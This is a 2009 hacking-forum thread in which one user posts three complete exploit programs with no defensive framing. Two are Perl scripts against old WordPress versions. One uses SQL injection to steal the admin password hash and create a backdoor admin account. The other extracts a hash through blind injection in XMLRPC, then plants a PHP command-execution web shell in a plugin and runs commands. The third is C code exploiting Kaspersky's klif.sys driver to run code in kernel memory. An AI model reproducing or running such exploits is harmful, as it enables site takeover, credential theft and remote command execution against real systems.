Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 6:52 pm

WordPress <= 1.5.1.1 "cat_id" Remote SQL Injection Exploit

Code: Select all

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;
use Digest::MD5 qw(md5_hex);
getopts('h:p:');

$path = $opt_h;
$pref = $opt_p || 'wp_';

if(!$path) { usage(); }

$xpl = LWP::UserAgent->new() or die;
&header();
print " +---

    * STEP 1 - TRY GET ADMIN INFO\n";

$reg = $path;
$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6
C%65%63%74%20%36%36%36%2C%63%6F%6E'.
'%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29
%2C%75%73%65%72%5F%6C%6F%67%69'.
'%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75
%73%65%72%5F%70%61%73%73%2C%63'.
'%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C
%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.
'%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%
52%45%20%49%44=1'; ### 1 - admin ID
$res = $xpl->get($reg);
die "ERROR : ", $res->status_line unless $res->is_success;
if($res->content =~ m/(?::Roll Eyes(.*)(?::Roll Eyes([a-f0-9]{32})(?::Roll Eyes(<\/title>)/)
{
$login = $1; $hash = $2;
print "\n>> LOGIN : $login\n>> HASH : $hash\n\n";
}
else { print "ERROR : Forum not vulnerable or bad prefix."; exit(); }

$cookie_jar = HTTP::Cookies->new();
($cpath = $path) =~ s!/$!!;
$hash = md5_hex($hash);
($host = $cpath) =~ s!http://([^/]*).*!$1!;
$cpath = md5_hex($cpath);

$xpl->cookie_jar( $cookie_jar );

$cookie_jar->set_cookie( "0","wordpresspass_$cpath","$hash","/",$host,,,,,);
$cookie_jar->set_cookie( "1","wordpressuser_$cpath","$login","/",$host,,,,,);
print " +---

    * STEP 2 - CREATE NEW USER\n";

$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->post("$reg",
{
"action" => "adduser",
"user_login" => "r57",
"firstname" => "RST",
"lastname" => "GHC",
"email" => "digitalcat\ @usa.com",
"uri" => "xcode.or.id",
"pass1" => "r57",
"pass2" => "r57",
"adduser" => "Submit",
},
Referer => $reg
);
print " +---

    * STEP 3 - GET ID OF NEW USER\n";

$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->get("$reg",Referer => $reg);
 @res = split(/\n/,$res->content);
$id = 0;
for( @res)
{
if(/(?:\<td align=\'center\'\>)([0-9]*)(?:\<\/td\>)/) { $id = $1; }
if(/\<td\>\<strong\>r57\<\/strong\>\<\/td\>/) { last; }
}
die "ERROR : ", $res->status_line unless $res->is_success;
if($id != 0) { print "\n>> ID : $id\n\n"; }
else { print "[-] ERROR : CAN'T GET NEW USER ID\n"; exit(); }
print " +---

    * STEP 4 - LEVEL UP FOR NEW USER\n\n";

$reg = $path;
$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';
for($i=0;$i<10;$i++)
{
print ">> LEVEL UP # $i\n";
$res = $xpl->get("$reg",Referer => $reg);
die "ERROR : ", $res->status_line unless $res->is_success;
}
print "\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\n";

sub usage()
{
&header();
print "USAGE : r57wp.pl [OPTIONS]\n";
print "\noptions:\n\n";
print "-h [path]\n";
print " Path to wordpress installed\n";
print "-p [prefix] (optional)\n";
print " Database tables prefix (default 'wp_')\n\n";
print "e.g.: r57wp.pl -h http://blah.com/wordpress/\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "(c)oded by digital cat";
print "RST/GHC\n";
print "http://xcode.or.id\n";
exit();
}
sub header()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print " WordPress 1.5.1.1 exploit \n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}
Terima Kasih.......

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 6:58 pm

WordPress 1.5.1.2 XMLRPC Module Remote SQL Injection Exploit

Code: Select all

#!/usr/bin/perl -w
use LWP::UserAgent;
use Digest::MD5 qw(md5_hex);

my $ua = new LWP::UserAgent;
$ua->agent("Wordpress Hash Grabber v1.0" . $ua->agent);

my  @char = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $host = $ARGV[0]; # The path to xmlrpc.php
my $user = $ARGV[1]; # The target login, default wp user is admin
my $post = $ARGV[2]; # Must be a valid pingback or part
my $exec = $ARGV[3]; # Command to execute
my $pref = 'wp_'; # database prefix!
my $hash = '';

if ( !$ARGV[2] )
{
die("Im Not Psychic ..\n");
}

print "

    * Trying Host $host ...\n";


my $res = $ua->get($host.'/xmlrpc.php');

if ( $res->content =~ /XML-RPC server accepts POST requests only/is )
{
print "

    * The XMLRPC server seems to be working \n";

}
else
{
print "[!] Something seems to be wrong with the XMLRPC server \n ";
open(LOG, ">wp_out.html"); print LOG $res->content;
exit;
}

for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $sql = "<?xml version=\"1.0\"?><methodCall>
<methodName>pingback.ping</methodName>
<params><param><value>
<string>foobar' UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 FROM " . $pref . "
users WHERE (user_login='$user' AND MID(user_pass,$i,1)='$char[$j]')/*</string>
</value></param><param><value><string>$host/?p=$post#$post</string>
</value></param><param><value><string>admin</string></value>
</param></params></methodCall>";
my $req = new HTTP::Request POST => $host . "/xmlrpc.php";
$req->content($sql);
$res = $ua->request($req);
$out = $res->content;

if ( $out =~ /The pingback has already been registered/)
{
$hash .= $char[$j];
print "

    * Char $i is $char[$j]\n";

last;
}

}

if ( length($hash) < 1 )
{
open(LOG, ">wp_out.html"); print LOG $out;

print "[!] $host not vulnerable? Better verify manually!\n";
exit;
}
if ( $out =~ /<value><int>0<\/int><\/value>/)
{
print "[!] Invalid post information specified! \n";
exit;
}
if ( $out =~ /different number of columns/is || $hash =~ /([0]{5})/ )
{
open(LOG, ">wp_out.html"); print LOG $out;

print "[!] The database structured has been altered, check manually \n";
exit;
}

}

print "

    * Host : $host\n";

print "

    * User : $user\n";

print "

    * Hash : $hash\n";

print "

    * Attempting to create shell .. \n";
my $ckey = md5_hex($host);
$hash = md5_hex($hash);

my  @cookie = ('Referer' => $host.'/wp-admin/plugins.php;','Cookie' =>
'wordpressuser_'.$ckey.'='.$user.'; wordpresspass_'.$ckey.'='. $hash);
$res = $ua->get($host.'/wp-admin/plugin-editor.php',  @cookie);

if ( $res->content =~ /<strong>(.*)\.php<\/strong>/i )
{
my  @list = ($1.'.php', 'hello.php', 'markdown.php', 'textile1.php');
my $file;


foreach $file ( @list)
{

print "

    * Trying filename $file ...\n";

$res = $ua->get($host.'/wp-admin/plugin-editor.php?file='.$file,  @cookie);

if ( $res->content =~ /<textarea[^>]*>(.*)<\/textarea>/is )
{
my $data = $1;

$data =~ s/>/>/ig;
$data =~ s/</</ig;
$data =~ s/"/"/ig;
$data =~ s/&/&/ig;

my $add = ( $data =~ /<cmdout>(.*)<\/cmdout>/is ) ? '': '<cmdout>
<?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>';

$res = $ua->post($host . "/wp-admin/plugin-editor.php",
['newcontent' => $add.$data, 'action' => 'update', 'file' => $file, 'submit' => 'foobar'],  @cookie);

print "

    * Trying to activate $file ... \n";

$res = $ua->get($host.'/wp-admin/plugins.php?action=activate&plugin='.$file ,  @cookie);

print "

    * Trying to execute $exec ... \n";

$res = $ua->get($host.'/wp-admin/plugins.php?cmd='.$exec,  @cookie);

if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is )
{
# Send results to STDOUT
print "

    * Successfully executed $exec\n\n\n";

print $1;
exit;
}
else
{

print "[!] Couldnt execute command $exec\n";
open(LOG, ">wp_out.html"); print LOG $res->content;

print "[!] Trying to access $file directly!\n";
$res = $ua->get($host.'/wp-content/plugins/'.$file.'?cmd='.$exec,  @cookie);

if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is )
{
# Send results to STDOUT
print "

    * Successfully executed $exec\n\n\n";

print $1;
exit;
}
else
{

print "[!] Couldnt execute command $exec\n";
print "

    * Try $host/wp-content/plugins/$file manually\n";

}
}
}
else
{

print "[!] Could not read file $file \n";
open(LOG, ">wp_out.html"); print LOG $res->content . $file;
}

}

}
else
{

print "[!] Could Not Get Plugin Information\n";
open(LOG, ">wp_out.html"); print LOG $res->content;
}

exit;
Terima Kasih.......

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:00 pm

Kaspersky AntiVirus 5.x "klif.sys" Local Privilege Exploit

Advisory : FrSIRT/ADV-2005-0696
Rated as : Moderate Risk

Code: Select all

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200
0x68,0x00,0x80,0x93,0xBE, //push <buffer address> - 0xBE938000
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<GetModuleFileNameA> -> +13
0xFF,0xD0, //call eax
0x68,0x00,0x80,0x93,0xBE, //push <buffer address>
0x68,0x00,0x82,0x93,0xBE, //push <address of the notepad path>- 0xBE938200
0xB8,0x00,0x00,0x00,0x00, //mov eax,<lstrcmpiA> -> +30
0xFF,0xD0, //call eax
0x85,0xC0, //test eax,eax
0x74,0x03, //je +03
0xC2,0x04,0x00, //retn 4
0x6A,0x00, //push 0
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<MessageBoxA> -> +58
0xFF,0xD0, //call eax
0xC2,0x04,0x00 //retn 4
};

unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE};
//jmp dword prt [0xBE9372B0]

//////////////////////////////////////////////////////////////

BOOLEAN LoadExploitIntoKernelMemory(void){



//Get function's addresses

HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
HANDLE hUser=GetModuleHandle("USER32.DLL");

FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");

FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");

*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
*(DWORD*)(code+30)=(DWORD)plstrcmpiA;
*(DWORD*)(code+58)=(DWORD)pMessageBoxA;

//Prepare our data into ring0-zone.

PCHAR pNotepadName=(PCHAR)0xBE938200;

char temp_buffer[MAX_PATH];
char *s;

SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

lstrcpy(pNotepadName,temp_buffer);

PCHAR pMessage=(PCHAR)0xBE938400;

lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");

memmove(pCodeBase,code,sizeof(code));

*pJmpAddress=(DWORD)pCodeBase;

memmove(pKAVRet,jmp_code,sizeof(jmp_code));

return TRUE;
}

///////////////////////////////////////////////////////////////

void UnloadExploitFromKernelMemory(){

UCHAR retn_4[]={0xC2,0x04,0x00};

memmove(pKAVRet,retn_4,sizeof(retn_4));

}

/////////////////////////////////////////////////////////////////

PUCHAR GetKAVRetAddress(void){

//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.

UCHAR retn_4[]={0xC2,0x04,0x00};

__try{

for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){

if(memcmp(pKAVRets,retn_4,sizeof(retn_4))==0)
return pKAVRets;

}

}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is
not installed",NULL,0);return NULL;}


MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or
5.0.335 versions of KAV",NULL,0);
return NULL;
}

/////////////////////////////////////////////////////////////////

void main(void){

pKAVRet=GetKAVRetAddress();

if(NULL==pKAVRet)
return;


if(!LoadExploitIntoKernelMemory())
return;

char temp_buffer[MAX_PATH];
char *s;

SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

PROCESS_INFORMATION pi;

STARTUPINFO si={0};
si.cb=sizeof(si);

CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
0,NULL,NULL,&si,&pi);

WaitForSingleObject(pi.hProcess,INFINITE);

MessageBox(NULL,"Now you may start your own Notepad instance to
check this exploit!","KAV_EXPLOITER",0);

MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);

UnloadExploitFromKernelMemory();
}
Terima Kasih.......

Image

Image

Image

Image

Post Reply

Return to “Web Hacking”